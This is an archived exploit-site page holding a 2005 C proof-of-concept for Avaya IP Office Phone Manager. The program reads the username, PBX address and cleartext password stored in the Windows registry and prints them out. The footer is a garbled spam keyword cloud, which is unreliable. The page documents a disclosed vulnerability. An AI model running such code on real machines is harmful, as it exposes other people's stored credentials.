about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Avaya IP Office Phone Manager Local Passwords Disclosure Exploit



2005-02-24 Avaya IP Office Phone Manager Local Passwords Disclosure Exploit
#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
Filename: exploit.c
Title: Avaya IP Office Phone Manager - Cleartext Sensitive Data
Vulnerability
Exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 24th Feb, 2005
Other info: tested on version 2.013. Compile as a Win32 console
application
project in Visual C++
*/

BOOL QueryVal(char lszVal2Query[255], char lszValData[255])
{
char lszResult[255];
HKEY hKey;
LONG returnStatus;
DWORD dwType=REG_SZ;
DWORD dwSize=255;
returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);

if (returnStatus == ERROR_SUCCESS)
{
returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL,
&dwType,(LPBYTE)&lszResult, &dwSize);
if (returnStatus == ERROR_SUCCESS)
{
strcpy(lszValData, lszResult);
}
RegCloseKey(hKey);
return TRUE;
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}

void main()
{
char valData[255];

printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data
Vulnerability Exploit\n");
printf("By pagvac (Adrian Pastor)\n");
printf("Tested on version 2.013\n\n");

// Print username
printf("Username:\t");
if(!QueryVal("UserName", valData))
printf("Error! No permissions to read key value?\n");
else
printf("%s\n", valData);

// Print IP address
printf("PBX IP Address:\t");
if(!QueryVal("PBXAddress", valData))
printf("Error! No permissions to read key value?\n");
else
printf("%s\n", valData);

// Print password
printf("Password:\t");
if(!QueryVal("Password", valData))
printf("Error! No permissions to read key value?\n");
else
{

if(strcmp(valData, "")==0)
printf("[blank password]\n\n");
else
{
printf("%s\n", valData);
printf("Password obsfucated?\n\n");
}
}

}
securitydot.net - 2005-02-24

Advertising

Copyright 2007, SecurityDot
Tue, 08 Dec 2009 21:54:22 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sexworld 200 /compo p...rz.be/ 2...b.id/r Naruto sex WWW.BF.COM www.xhaha. www.trish pil Foto ayam www.six wo 18inccheso scan admin www pink w www.wetpus e.../ext/r bbs.fw23.c ip board 2 188xxg.cn allinurl% cqyijia.co index.php? bigboobs Sexvideoes Indonesia www.bjsswx mambo Remo PHPFinance www womens 1111 hot y neck wwwwwwwwww Shakeela h sexy fictu rpc 3com tftp 200 /compo /search/ex Azer 200 /compo ...bs.com 1.3 perl e IP board 2 CMS is Fre Www.sex 10 www womens Ax Shakeela h NetWorker Crack Data